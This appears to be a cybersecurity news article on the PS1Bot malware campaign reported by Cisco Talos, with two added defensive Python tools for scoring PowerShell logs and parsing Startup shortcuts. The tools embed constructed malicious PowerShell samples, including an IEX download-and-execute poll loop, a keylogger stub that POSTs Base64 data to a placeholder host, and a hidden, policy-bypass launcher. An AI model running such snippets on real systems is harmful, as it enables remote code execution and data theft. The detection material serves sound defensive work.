Post: PS1Bot: Multi-Stage Malware Framework Targeting Windows Systems - Against Invaders - CyberSecurity News for Humans.
<div>
<div>
<p>Cisco Talos researchers have uncovered an aggressive malware campaign, active since early 2025, that deploys a multi-stage framework dubbed PS1Bot, implemented primarily in PowerShell and C#. </p>
<p>The threat actor uses malvertising and SEO poisoning to distribute compressed archives whose file names mimic popular search queries, such as “chapter 8 medicare benefit policy manual.zip” or “pambu panchangam 2024-25 pdf.zip”. </p>
<p>Once extracted, the victim finds a <a href="https://gbhackers.com/hackers-exploit-svg-files-with-embedded-javascript/" rel="noreferrer noopener" target="_blank">JavaScript file</a> named “FULL DOCUMENT.js”, which contains obfuscated VBScript that acts as a downloader. </p>
<p>That script fetches a JScript scriptlet from an attacker-controlled server. The scriptlet sets up the environment by writing a PowerShell script to C:\ProgramData (for example ntu.ps1) and executing it, and that script begins polling a command-and-control (C2) server. </p>
<p>The polling loop derives a per-victim URL from the volume serial number of the C: drive and repeatedly passes whatever PowerShell the server returns to Invoke-Expression (IEX), so each stage runs in memory and leaves few artifacts on disk. </p>
<p>This modular design echoes earlier threats such as AHK Bot and overlaps with Skitnet infrastructure, including shared <a href="https://gbhackers.com/new-acrstealer-exploits-google-docs-and-steam/" rel="noreferrer noopener" target="_blank">C2 domains</a> and code patterns, which suggests an evolutionary relationship with those families, although no direct binary delivery was observed in the analyzed infection chains.</p>
<h2 id="h-advanced-modules-for-espionage-and-theft"><strong>Advanced Modules for Espionage and Theft</strong></h2>
<p>PS1Bot’s flexibility comes from its set of deployable modules, each built for a specific task; every module also reports its status back to the C2 through HTTP GET requests that carry the log message in URL parameters. </p>
<p>An antivirus detection module queries Windows Management Instrumentation (WMI) to enumerate installed security products like Windows Defender, relaying results to the C2 for reconnaissance. </p>
<p>Next, a screen capture module compiles C# at runtime with PowerShell’s Add-Type cmdlet, producing an in-memory assembly that takes bitmap screenshots. The images are written temporarily under %TEMP% and %APPDATA%, Base64-encoded, sent to the C2 in an HTTP POST body, and then deleted to limit forensic traces. </p>
<p>The “grabber” module, a potent information stealer, targets browser data from over 40 variants including Chrome, Edge, and Brave, alongside cryptocurrency extensions like MetaMask and Ledger, staging files in %TEMP% for compression and upload. </p>
<p>It also covers local wallet applications such as Exodus and Electrum, and uses embedded wordlists (English, Czech and cryptocurrency-specific terms, including seed-phrase vocabulary) to scan the file system for documents that match criteria such as extension (.txt, .pdf) and size under 100 KB, looking for passwords or wallet seeds that are then exfiltrated separately. </p>
<p>Keylogging functionality mirrors this approach, compiling C# for SetWindowsHookEx() hooks to capture keystrokes, mouse events, and clipboard data, transmitting logs in HTTP POST bodies. </p>
<p>A system survey module, “WMIComputerCSHARP,” gathers domain details via WMI queries and environment variables, aiding in targeting high-value networks. </p>
<p>Persistence is achieved by creating a randomly named directory under %PROGRAMDATA% that holds an obfuscated PowerShell script fetched from C2 paths such as /transform; an LNK file in the Startup folder launches it after a reboot, and a mutex prevents duplicate instances from running.</p>
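<p>The behaviours described above (the IEX polling loop keyed to the C: volume serial, Add-Type compiling C# for screenshots and SetWindowsHookEx keylogging, Base64 bodies in HTTP POST requests, script drops under ProgramData and mutex handling) all surface in PowerShell script block logging. The following is an added example, not code from the Talos report or from the article: a small scorer that runs over the decoded ScriptBlockText of Event ID 4104 records and flags combinations of those behaviours. The rule names, weights, threshold and the four log records are constructed for the example; the C2 URL scheme and command lines are assumptions, not reported indicators.</p>

```python
"""Score PowerShell script-block log text (Event ID 4104) for PS1Bot-style behaviour.

Added example: this is not code from the Talos report or from the article. The
rules look for combinations the article describes: Invoke-Expression over
web-fetched content, a C2 URL built from the C: volume serial number, Add-Type
compiling C# that hooks input or grabs the screen, Base64 bodies sent by HTTP
POST, scripts dropped under ProgramData, and mutex handling. The four log
records at the bottom are constructed for this example, not real captures.
"""
import re
from dataclasses import dataclass

SUSPICIOUS_SCORE = 4  # threshold chosen for this example; tune to your own telemetry


@dataclass(frozen=True)
class Rule:
    name: str
    weight: int
    all_of: tuple  # every pattern must match somewhere in the script block


def _rx(pattern: str):
    return re.compile(pattern, re.IGNORECASE)


RULES = (
    Rule("iex_of_downloaded_content", 3, (
        _rx(r"\b(iex|invoke-expression)\b"),
        _rx(r"downloadstring|invoke-webrequest|\biwr\b|net\.webclient|invoke-restmethod|\birm\b"),
    )),
    Rule("volume_serial_in_url", 3, (_rx(r"volumeserialnumber"), _rx(r"https?://"))),
    Rule("add_type_hook_or_capture", 3, (
        _rx(r"\badd-type\b"),
        _rx(r"setwindowshookex|copyfromscreen|system\.drawing\.bitmap"),
    )),
    Rule("base64_http_post", 2, (
        _rx(r"tobase64string"),
        _rx(r"-method\s+post|uploadstring|uploaddata"),
    )),
    Rule("programdata_script_drop", 1, (_rx(r"""programdata\\[^\s"']*\.ps1"""),)),
    Rule("mutex_single_instance", 1, (_rx(r"system\.threading\.mutex"),)),
)


def score_script_block(text: str) -> dict:
    """Return the rules that fire on one script block and their summed weight."""
    hits = [r.name for r in RULES if all(p.search(text) for p in r.all_of)]
    score = sum(r.weight for r in RULES if r.name in hits)
    return {"hits": hits, "score": score, "suspicious": score >= SUSPICIOUS_SCORE}


def triage(records):
    """records: iterable of (record_id, ScriptBlockText) pairs taken from 4104 events."""
    return [{"record_id": rid, **score_script_block(text)} for rid, text in records]


# Constructed ScriptBlockText samples (not real captures); hostnames are placeholders.
SAMPLE_RECORDS = (
    ("admin-cleanup", r"""
Get-ChildItem C:\ProgramData\Logs -Filter *.log | Where-Object Length -gt 1MB | Remove-Item
Invoke-WebRequest -Uri https://example.invalid/update.json -OutFile update.json
"""),
    ("c2-poll-loop", r"""
$serial = (Get-CimInstance Win32_LogicalDisk -Filter "DeviceID='C:'").VolumeSerialNumber
while ($true) {
  try { IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/$serial") } catch {}
  Start-Sleep -Seconds 30
}
"""),
    ("keylogger-module", r"""
$src = @"
using System; using System.Runtime.InteropServices;
public class KL { [DllImport("user32.dll")] public static extern IntPtr SetWindowsHookEx(int id, IntPtr fn, IntPtr mod, uint tid); }
"@
Add-Type -TypeDefinition $src
$body = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$env:TEMP\kl.txt"))
Invoke-RestMethod -Uri https://example.invalid/log -Method Post -Body $body
"""),
    ("persistence-stage", r"""
$m = New-Object System.Threading.Mutex($false, "Global\q8x2")
Set-Content -Path "C:\ProgramData\kq2m\kq2m.ps1" -Value $payload
"""),
)

if __name__ == "__main__":
    for r in triage(SAMPLE_RECORDS):
        print(f"{r['record_id']:<20} score={r['score']:<2} suspicious={r['suspicious']} hits={r['hits']}")
```

<p>Each rule requires all of its patterns to appear in the same script block, which is what separates a poll-and-IEX loop from an ordinary Invoke-WebRequest download. The persistence record scores below the threshold on its own, which is deliberate: a ProgramData script path plus a mutex is weak evidence in isolation, and the scorer is meant to be run per script block with the hits correlated across the host rather than used as a single yes/no signature.</p>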
<h2 id="h-evolving-threat-landscape"><strong>Evolving Threat Landscape</strong></h2>
<p>Throughout 2025, PS1Bot has demonstrated rapid evolution, with frequent new samples and module updates observed, indicating active development. </p>
<p>Its in-memory execution and minimal persistence artifacts complicate forensic analysis, while the overlaps with AHK Bot (C2 URL derivation and modular polling) and with Skitnet (PowerShell similarities) point to a maturing ecosystem of Windows-targeted threats. </p>
<p>According to the <a href="https://blog.talosintelligence.com/ps1bot-malvertising-campaign/" rel="noreferrer noopener nofollow" target="_blank">report</a>, Talos assesses with high confidence that additional, not yet observed modules exist, letting the operators adapt quickly to espionage, financial theft or lateral movement.</p>
<p>Organizations should monitor for anomalous PowerShell activity (script block logging, Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, captures the in-memory stages that never touch disk), unusual WMI queries, and the malvertising lures that deliver the initial archive. </p>
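<p>Beyond log monitoring, the Startup-folder LNK persistence described in the module section above leaves an artifact that can be hunted directly. The following is an added example, not code from the Talos report or from the article: a parser for the Shell Link (.lnk) format that extracts the target path and arguments and flags shortcuts that launch a script host against a script under ProgramData with hidden-window or policy-bypass switches. The two shortcuts are built in memory for the example; the directory name and the exact PS1Bot command line are assumptions, not reported indicators.</p>

```python
"""Parse Startup-folder .lnk files and flag ones that launch scripts from ProgramData.

Added example: not code from the Talos report or from the article. The article
says PS1Bot persists through an LNK file in the Startup folder that points at an
obfuscated PowerShell script in a randomly named %PROGRAMDATA% directory. This
reads the Shell Link header, LinkInfo and StringData sections of a .lnk and
scores the target and arguments. The two shortcuts below are built in memory for
the example; the exact PS1Bot command line is an assumption, not a reported IOC.
"""
import ntpath
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections in on-disk order, with the LinkFlags bit that enables each
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}


def parse_lnk(data: bytes) -> dict:
    """Return LinkInfo.LocalBasePath and the StringData fields of a Shell Link file."""
    if len(data) < 76 or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"local_base_path": None}
    pos = 76  # fixed-size ShellLinkHeader
    if flags & HAS_IDLIST:  # LinkTargetIDList: uint16 size followed by the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:
        size, _hdr_size, li_flags, _vol_off, lbp_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x01:  # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            start = pos + lbp_off
            info["local_base_path"] = data[start:data.index(b"\x00", start)].decode("cp1252")
        pos += size
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # character count, no terminator
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos + 2:pos + 2 + count * width]
        info[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += 2 + count * width
    return info


def assess(info: dict) -> list:
    """Reasons a Startup shortcut looks like script-based persistence."""
    reasons = []
    target = info.get("local_base_path") or info.get("relative_path") or ""
    args = info.get("arguments") or ""
    if ntpath.basename(target).lower() in SCRIPT_HOSTS:
        reasons.append(f"target is a script host: {target}")
    if re.search(r"""programdata\\[^\s"']*\.(ps1|js|vbs|jse|wsf)\b""", args, re.I):
        reasons.append("arguments reference a script under ProgramData")
    if re.search(r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", args, re.I):
        reasons.append("hidden window, policy bypass or encoded command flags")
    return reasons


def build_lnk(target: str, arguments: str = "", working_dir: str = "") -> bytes:
    """Build a minimal .lnk (LinkInfo + Unicode StringData) so the samples exist in memory."""
    flags = HAS_LINKINFO | IS_UNICODE | (0x10 if working_dir else 0) | (0x20 if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    volume_id = struct.pack("<IIII", 0x11, 3, 0x1234ABCD, 0x10) + b"\x00"  # DRIVE_FIXED, empty label
    path = target.encode("cp1252") + b"\x00"
    lbp_off = 28 + len(volume_id)  # LinkInfo header is 28 bytes without optional offsets
    suffix_off = lbp_off + len(path)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 28, 1, 28, lbp_off, 0, suffix_off)
    link_info += volume_id + path + b"\x00"  # empty CommonPathSuffix
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (working_dir, arguments) if s)
    return header + link_info + strings


# Constructed shortcuts, not real samples; the PS1Bot command line is an assumption.
SAMPLES = {
    "VendorSync.lnk": build_lnk(r"C:\Program Files\Example\Sync.exe"),
    "kq2m.lnk": build_lnk(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                          r'-w hidden -ep bypass -f "C:\ProgramData\kq2m\kq2m.ps1"',
                          r"C:\ProgramData\kq2m"),
}


def assess_samples() -> dict:
    return {name: assess(parse_lnk(blob)) for name, blob in SAMPLES.items()}


if __name__ == "__main__":
    for name, reasons in assess_samples().items():
        print(name, "->", reasons or ["no findings"])
```

<p>On a live host, feed parse_lnk the bytes of every .lnk in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup and %PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\StartUp. The parser deliberately reads the target from LinkInfo rather than from the shortcut's display name, because the name is attacker-controlled; a shortcut that parses but has no LinkInfo and only a relative path is itself worth a look.</p>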
</div></div>